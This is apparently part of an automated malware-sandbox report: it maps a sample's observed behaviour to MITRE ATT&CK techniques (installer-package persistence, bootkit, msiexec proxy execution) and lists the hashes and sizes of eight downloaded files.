  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Persistence
- Event Triggered Execution (1): Installer Packages (1)
- Pre-OS Boot (1): Bootkit (1)
Defense Evasion
- Pre-OS Boot (1): Bootkit (1)
- System Binary Proxy Execution (1): Msiexec (1)
Downloads
- Filesize: 7KB
  MD5: a4a8ce0ddf6ab88bb915a101d04f043e
  SHA1: 531bf0452cf8c833397af429808f7c03e30ec507
  SHA256: cb25460926ba0b6cbc61b505926ec12e9852b92fada8bd37ef854a18be2dcaf8
  SHA512: 318e4ccb6669ca3a6da25bd199ce909005006ede2f69a581a35b0020421cffb5f130fbcbe0748b2bc9ffe6bb8c3241d8a01793fbcd1f36bd864b4b8acf4adfe8
- Filesize: 2.1MB
  MD5: fb22fb79f366c65257b7adb24c70d843
  SHA1: ca6d29a4806d52350e1a50c7b71526dfaab2d525
  SHA256: 44f2ea5b5dd47fc256a341dee1d2dacfc24adba395a49fd8c4ad3613bfe2d43d
  SHA512: c4dfb9273bd937f5480646e12d77073a476719f1f15ee5885e0999f0bbc68f80b1909489f7bd78a3bfb4687a55442f655f4538fda20afe4a7b87623e9bdfe7d9
- Filesize: 577KB
  MD5: c31c4b04558396c6fabab64dcf366534
  SHA1: fa836d92edc577d6a17ded47641ba1938589b09a
  SHA256: 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
  SHA512: 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99
- Filesize: 1.5MB
  MD5: d045828473a8165effd59a97232e6107
  SHA1: f86bd9763d6c70ec3ca79134598de4fa44c6bc94
  SHA256: 9aaae0f7b3bdab287ad703c7eb4baa1a0746b6d353e57ae74d985b10a2102016
  SHA512: 07e77aa6a433d4541d80276d37e682012509b480a6861f9fbe3cd89929b352d6754cc649526f95c4bd76cf4e1c8bceb275a0217c38193ab88891166934d79659
- Filesize: 1.5MB
  MD5: 831ff4029b30419da4ac4d32bf8ff05c
  SHA1: 8c121d0cd017ce5f7ca8cbf6abd8909b2fe445bc
  SHA256: ab281716242897be222c1d4cc979fd5de9e7d1cde56e70ac1010e6b3dc76826d
  SHA512: 17f2efdb891dcf9ceacb8b24801ec59866f969baa55d1c92c15a7150c13f18cc3f481984b5971456e1ad0f204db016698bfe012c086ffa2028582c1d9302a8c5
- Filesize: 6.0MB
  MD5: 57dadd6a929f64c2b1efe2d52c1c4985
  SHA1: 962cb227f81f885f23826c3e040aa9dbc97659cf
  SHA256: 996b5d59cce7955b4374bd00d83c422d3a1d9ffebba59c66074c37ab28cfaeb5
  SHA512: 3f64c35e72698ea6a7e708a4367277f3ab62c27f0652e0c55bab6e02239ee37c4f0a21503c0688301fb77bbf8e59e3c5c8aa2df8d62a4ab8a9b9cdf6f0a775cf
- Filesize: 2KB
  MD5: c313ef3605773ce19c1d74c4cf92990e
  SHA1: 75f90116d63472a7173fb2f1e2413d98b2aa09b1
  SHA256: d1f1280e89caa8ead1024f56614aad8e4a3dd0f5d697a57a2f660170abac1da7
  SHA512: 13239ff124d6e39d5195f208197fac1bf929e7abce4b9a401e3f4dab5e3e09250fc8560eb5f835e76354b194d7e5d7e4b24bed424bda0b126cd2b0f36f0d7bfd
- Filesize: 28.2MB
  MD5: ef294458016f546c5eebd07d2dd98bad
  SHA1: 66bb14f670055272e12899d401b8668cad15fac9
  SHA256: c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a
  SHA512: 97ee150f49bb587147f30d2215174f5376420abd5d659a2c68d58bc67f823715030cc328eab7e11623f4ee8504f1f080ceb44ac2d6fca7c636ea8d7c936f0333